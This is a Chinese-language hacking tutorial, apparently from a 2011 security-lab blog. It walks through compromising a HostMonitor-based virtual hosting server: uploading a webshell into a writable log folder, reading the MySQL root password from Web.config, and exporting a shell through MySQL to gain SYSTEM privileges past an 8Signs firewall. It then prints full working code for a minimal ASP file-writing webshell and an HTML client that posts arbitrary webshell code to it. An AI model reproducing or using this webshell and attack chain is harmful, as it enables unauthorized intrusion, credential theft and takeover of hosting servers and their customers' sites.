某虚拟服务器提取秒杀(什么服务器我也不晓得)。
这里我就不截那么多图了,判断是否是我说的这类服务。浏览:HTTP://服务器IP/Management/,显示内容为:“This is PdfActivex in the ActiveX ,Add all in the WebPage !”
用 BS 的马直接浏览 c:\HostMonitor\vhostlog 文件夹,找个能上传的目录,上传 BS 的马,之后浏览:HTTP://服务器IP/vhostlog/shell.asp。
然后查看 c:\HostMonitor\Management\Web.config 文件,得到 Mysql root 的密码。
连接 MYSQL 数据库,然后,导出小马到 c:\HostMonitor\Management\ 文件夹下,得到 system 权限。
注意:这类服务器装有 8Signs Firewall 防火墙的,PHP、ASP、ASPX 很多小马大马都不能用,所以这里指定用 BS 的马。
|
小马的接收端:
<%
On Error Resume Next
set gl=server.CreateObJeCt("Adodb.Stream")
gl.Open
gl.Type=2
gl.CharSet="gb2312"
gl.writetext request("code")
gl.SaveToFile server.mappath(request("path")),2
gl.Close
set gl=nothing
response.redirect request("path")
%> |
|
小马的发送端,aspshelluP.Html:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>Asp shell up Client</title>
</head>
<style>
BODY { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; scrollbar-face-color:#E4E4F3; scrollbar-highlight-color:#FFFFFF; scrollbar-3dlight-color:#E4E4F3; scrollbar-darkshadow-color:#9C9CD3; scrollbar-shadow-color:#E4E4F3; scrollbar-arrow-color:#4444B3; scrollbar-track-color:#EFEFEF;}TABLE { FONT-SIZE: 9pt; BORDER-COLLAPSE: collapse; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-bottom-style: none; border-left-style: solid; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}input { font-family: "Courier New"; BORDER-TOP-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; BORDER-RIGHT-WIDTH: 1px;}textarea { font-family: "Courier New";}td { border-right-width: 1px; border-bottom-width: 1px; border-right-style: solid; border-bottom-style: solid; border-top-color: #d8d8f0;}.trHead { background-color: #e4e4f3; line-height: 3px;}.STYLE5 {font-family: Arial, Helvetica, sans-serif; font-size: 11pt;}
</style>
<body>
<table width="780" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td height="22" class="td" align="center" > <span class="STYLE5">Asp shell up Client </span> </td>
</tr>
<tr>
<td class="trHead"> </td>
</tr>
<td align="center" class="td"> </td>
<tr>
<td height="18" align="center" class="td">
<FORM method=post target=_blank>ShellUrl: <INPUT
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
size=58 value=http://127.0.0.1/s.asp name=act> Path: <INPUT
style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid"
size=8 value="4.txt" name=path> <INPUT onClick="Javascipt:name=path.value;action=document.all.act.value;submit();" type=button value="Submit" name=Send><BR>
发送的webshell代码:
<BR><TEXTAREA style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" name=code rows=20 cols=85></TEXTAREA>
</FORM>
</td>
</tr>
<tr>
<td align="right" class="td"> Powered By <a href="#" title="点击复制服务端到剪贴版" onclick='window.clipboardData.setData("text","\<%\nOn Error Resume Next\nset gl=server.CreateObJeCt(\"Adodb.Stream\") \ngl.Open \ngl.Type=2\ngl.CharSet=\"gb2312\" \ngl.writetext request(\"code\")\ngl.SaveToFile server.mappath(request(\"path\")),2 \ngl.Close \nset gl=nothing \nresponse.redirect request(\"path\")\n%\>");alert("\服务端已成功复制到剪贴")'>[Copy code]</a> 4ngr7 </td>
</tr><tr><td class="trHead"> </td></tr>
</table>
</body>
</html> |
文章作者
Nuclear'Atk
上次更新
2011-04-08
许可协议
Nuclear'Atk(核攻击)网络安全实验室版权所有,转载请注明出处。